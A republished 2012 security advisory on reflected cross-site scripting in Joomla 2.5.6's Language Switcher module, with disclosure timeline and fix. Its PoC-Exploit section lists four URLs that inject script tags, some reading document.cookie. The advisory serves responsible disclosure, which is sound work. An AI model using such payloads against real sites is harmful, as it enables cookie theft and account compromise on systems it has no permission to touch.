Joomla 2.5.6 Cross Site Scripting

🗓️ 20 Sep 2012 00:00:00Reported by Stefan SchurtzType

packetstorm🔗 packetstormsecurity.com👁 19 Views

Joomla 2.5.6 Module Language Switcher XS

`Advisory: Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities  
Advisory ID: SSCHADV2012-014  
Author: Stefan Schurtz  
Affected Software: Successfully tested on Joomla 2.5.6  
Vendor URL: http://www.joomla.org/  
Vendor Status: fixed  
  
==========================  
Vulnerability Description  
==========================  
  
With activated "Module Language Switcher . position-4" (Extensions -> Modules -> Module Manager: Module Language Switcher), multiple XSS are possible.  
  
==================  
PoC-Exploit  
==================  
  
// with default sample content  
  
http://[target]/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala  
http://[target]/joomla/index.php/image-gallery/"><script>alert('xss')</script>/25-koala  
  
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>  
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert('xss')</script>  
  
=========  
Solution  
=========  
  
Upgrade to version 2.5.7  
  
====================  
Disclosure Timeline  
====================  
  
28-Jun-2012 - vendor informed ([email protected])  
05-Jul-2012 - vendor informed again ([email protected])  
13-Sep-2012 - fixed by vendor  
  
========  
Credits  
========  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
===========  
References  
===========  
  
http://developer.joomla.org/security/news/540-20120902-core-xss-vulnerability  
http://www.darksecurity.de/advisories/2012/SSCHADV2012-014.txt  
`

20 Sep 2012 00:00Current

7.4High risk

Vulners AI Score7.4